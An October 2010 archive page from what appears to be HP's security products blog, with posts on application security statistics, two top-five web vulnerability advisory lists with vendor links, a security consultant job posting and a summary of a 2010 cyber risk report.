HP Security Products Blog
From applications to infrastructure, enterprises and governments alike face a constant barrage of digital attacks designed to steal data, cripple networks, damage brands, and perform a host of other malicious intents. HP Enterprise Security Products offers products and services that help organizations meet the security demands of a rapidly changing and more dangerous world. HP ESP enables businesses and institutions to take a proactive approach to security that integrates information correlation, deep application analysis and network-level defense mechanisms—unifying the components of a complete security program and reducing risk across your enterprise. In this blog, we will announce the latest offerings from HP ESP, discuss current trends in vulnerability research and technology, reveal new HP ESP security initiatives and promote our upcoming appearances and speaking engagements.

Displaying articles for: October 2010

80% of web applications can't pass a PCI audit

During recent in-depth security reviews of almost 3,000 applications, it was discovered that over 80% of web applications don't comply with the OWASP Top 10 list of critical web application errors and subsequently couldn't pass a PCI compliance audit. Obviously, application security still has a long way to go. It's overly simplistic, but being in compliance with regulations like PCI provides a good baseline of security. You can still be hacked if you are in compliance with PCI or HIPAA or anything else, but the chances that your organization will find itself in the news because of a breach are significantly reduced.  There are far easier targets.

 

It was also discovered that over 80% of third-party code failed security tests. According to the report, anywhere from 30-70% of internally developed applications are comprised of third-party components. That number should clarify the danger of insecure third-party code just as much as Siemens Stuxnet did (probably the most famous to date example of a vulnerability resulting from insecure third-party code).

 

What will seem like common-sense after you hear it...open-source software is more secure than either its in-house or commercial brethren. A lot. A whopping 93% of open source applications did not pose a potential security risk. Apparently many eyes (and many testers) can help to create more secure software.

 

As we’ve repeatedly seen over the past couple of years, Cross-Site Scripting remains main web application vulnerability. The report notes that a full 51% of the vulnerabilities discovered in these applications was Cross-Site Scripting.

 

Something of a  bright spot, though...the average time for organizations to fix security defects has now shrunk from 36-82 days to 12-19. That's a significant drop. At least it's a start...and a good one, at that.

 

http://www.darkreading.com/security_monitoring/security/app-security/showArticle.jhtml?articleID=227500475&cid=RSSfeed_DR_News%5C

Top Five Web Application Vulnerabilities 10/4/2010 - 10/17/2010

1) Oracle WebLogic Server Node Manager UNC Path Remote Security Vulnerability

 

Oracle WebLogic Server Node Manager is susceptible to a remote security vulnerability that could allow an attacker to execute malicious commands on the vulnerable server, possibly leading to compromise of the application and affected system. As of this writing a patch has not yet been released. Contact the vendor for additional information. 

 

http://www.securityfocus.com/bid/43931

 

2) Microsoft .NET Framework JIT Compiler Optimization Remote Code Execution Vulnerability

 

The Microsoft .NET Framework is susceptible to a remote code execution vulnerability. An attacker can exploit this vulnerability to execute arbitrary code in context of the current authenticated user or associated service account.  Fixes for this vulnerability have been released. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/43781

 

3) IBM WebSphere Application Server for z/OS Multiple Vulnerabilities

 

IBM WebSphere Application Server for z/OS is susceptible to multiple vulnerabilities including Cross-Site Scripting and Cross-Site Request Forgery. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. Cross-Site Request Forgery relies on a browser to retrieve and execute an attack. It includes a link or script in a page that connects to a site that the user may have recently used. The script then conducts seemingly authorized yet malicious actions on the user’s behalf. Updates which resolve these vulnerabilities have been released. Contact the vendor for additional details. 

 

http://www.securityfocus.com/bid/43875
http://www.securityfocus.com/bid/43874

 

4) HP Systems Insight Manager Arbitrary File Download Vulnerability

 

HP Systems Insight Manager is susceptible to an arbitrary file download vulnerability.  Attackers can leverage this vulnerability to view arbitrary files within context of the application, possibly gathering information that could lead to more damaging attacks. Updates which resolve this vulnerability have been released. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/44098

 

5) Ruby on Rails Nested Attributes Security Bypass Vulnerability

 

Ruby on Rails is susceptible to a security bypass vulnerability that can be exploited to bypass security restrictions and perform unauthorized actions.  Updates which resolve this vulnerability are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/44124

HP Software Professional Services seeks Application Security Delivery Consultant

HP Software Prof Svcs Application Security Delivery Consultant (Anywhere in the US)-428233

Location: Anywhere in the US, Atlanta, GA preferred
 
HP is looking for a qualified Sr. Application Security Consultant that has deep Application Security experience.  Consultant should have experience with performing Web Application Assessments, Network Penetration Testing, and be capable of manually exploiting/validating any identified vulnerabilities.  In addition to being able to perform security testing, the consultant must have strong technical writing skills so that exploits can be properly documented. 
 
The postion will also involve implementing HP Application Security Products (ex. AMP, WebInspect, and QAInspect). 50% of the job will be performing security assessments and the other 50% will be devoted to security product implementations.  Applicants should have experience with application security products from HP/SPI Dynamics or IBM/Watchfire.
 
Qualifications:

 
Candidates must be willing to work with minimum supervision to accomplish customer objectives.  Network Security experience is a plus.  Candidate must be willing to travel 50% of the time.

 

For more information and to apply, visit https://hp.taleo.net/careersection/2/jobsearch.ftl and enter job req # 428233 in the job number field.

 

Please complete the pre-screening questions to be considered for this role.

Top Five Web Application Vulnerabilities 9/13/2010 - 10/3/2010

1) Microsoft IIS Request Header Buffer Overflow Vulnerability

 

Microsoft IIS is susceptible to a remote Buffer Overflow vulnerability. Specially crafted HTTP requests can be leveraged to remotely execute code and in some instances to take complete control of affected systems. Updates which resolve this issue are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/43138

 

2) IBM FileNet Application Engine Open Redirection and Cross-Site Scripting Vulnerabilities

 

IBM FileNet Application Engine is susceptible to Open Redirection and Cross-Site Scripting vulnerabilities.  An attacker can leverage these issues to conduct spoofing and phishing attacks, and to execute script code in the browsers of unsuspecting users in context of the affected application, possibly leading to theft of authentication credentials. Updates which resolve these issues are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/43272

 

3) HP System Management Homepage Multiple Vulnerabilities

 

HP Systems Management Homepage is susceptible to multiple vulnerabilities including Cross-Site Scripting, Information Disclosure, URI Redirection, and HTTP Response Splitting. These vulnerabilities can aid in phishing attacks, be exploited to execute code in the browser of an unsuspecting user and steal cookie-based authentication credentials, influence or misrepresent how web content is served, cached, or interpreted, or used to access sensitive information without the proper credentials. Updates which resolve these vulnerabilities are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/43208
http://www.securityfocus.com/bid/43269
http://www.securityfocus.com/bid/43334
http://www.securityfocus.com/bid/43462
http://www.securityfocus.com/bid/43463

 

4) RSA Authentication Agent for Web Directory Traversal Vulnerability

 

RSA Authentication Agent for Web is susceptible to a Directory Traversal vulnerability.  An attacker can leverage this vulnerability to access arbitrary data, possibly leading to more damaging attacks. Updates which resolve this issue are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/43406

 

5) Mantis Multiple Cross-Site Scripting Vulnerabilities

 

Mantis is susceptible to multiple instances of Cross-Site Scripting.  An attacker can leverage these issues to execute script code in the browsers of unsuspecting users in context of the affected application, possibly leading to theft of authentication credentials and other attacks. Updates which resolve these issues are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/43604

Malicious JavaScript attacks have increased 60% so far this year

The 2010 Top Cyber Security Risks Report from HP TippingPoint DV Labs was just released and is definitely worth reading. Compiled from attack data from TippingPoint and Qualys, as well as additional analysis provided by the Internet Storm Center and Sans, it provides an invaluable view into the current state of application security.

 

There are several key takeaways. One is that web applications continue to pose one of the biggest risks to corporate networks (ok, so that's not much of a surprise).  Applications remain a double edged sword.  They're relatively inexpensive to produce and immensely  flexible, so  the number of them continues to rise. Yet it's this interactivity and availability that makes them such attractive targets. Long story short, it's not network security that's the weak link. It's the applications, dummy.       

 

Trends that have been evident for several years have also  been further clarified... attackers are unfortunately getting more organized and sophisticated in their methodologies.  Intruders can easily be 'inside' for months without being detected, and take advantage of that window of opportunity to gather the information necessary to conduct far more devastating attacks.

 

While the number of vulnerabilities discovered in applications hasn't risen dramatically in recent years, it's not an improvement because the number of attacks per vulnerability has exploded.  How is this? Hacking has evolved from sport and one time stings into an organized (and often state-sponsored) criminal enterprise.  There are more and smarter attackers (not to mention compromised systems) now than ever before.

 

The exception to the number of newly discovered vulnerabilities is Cross-Site Request Forgery (CSRF). Part of the problem is that these are complex vulnerabilities and not easy to find, so the real scale of the problem is only now coming into focus. Compounding the issue,  many web sites continue to ignore CSRF because while there are ways to prevent these attacks they can complicate the application's design.  Better methods of discovery plus lax prevention will lead to even more CSRF vulnerabilities for foreseeable future.

 

The most mind-blowing statistic, though, is that during the first half of 2010 malicious JavaScript attacks grew at an alarming rate of 60%. Data from January showed over 55,000 filter hits, while the data from June showed over 90,000. Attacks were most often conducted against government, financial, and educational institutions.

 

Obviously, the report goes into much greater detail (including example exploits) than this blog post, and includes much more information on many additional topics. View the full report here:

 

http://dvlabs.tippingpoint.com/toprisks2010

 

Search
Showing results for 
Search instead for 
Do you mean 
About the Author(s)
HP Blog

HP Software Solutions Blog

Featured


Follow Us
Labels
The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation.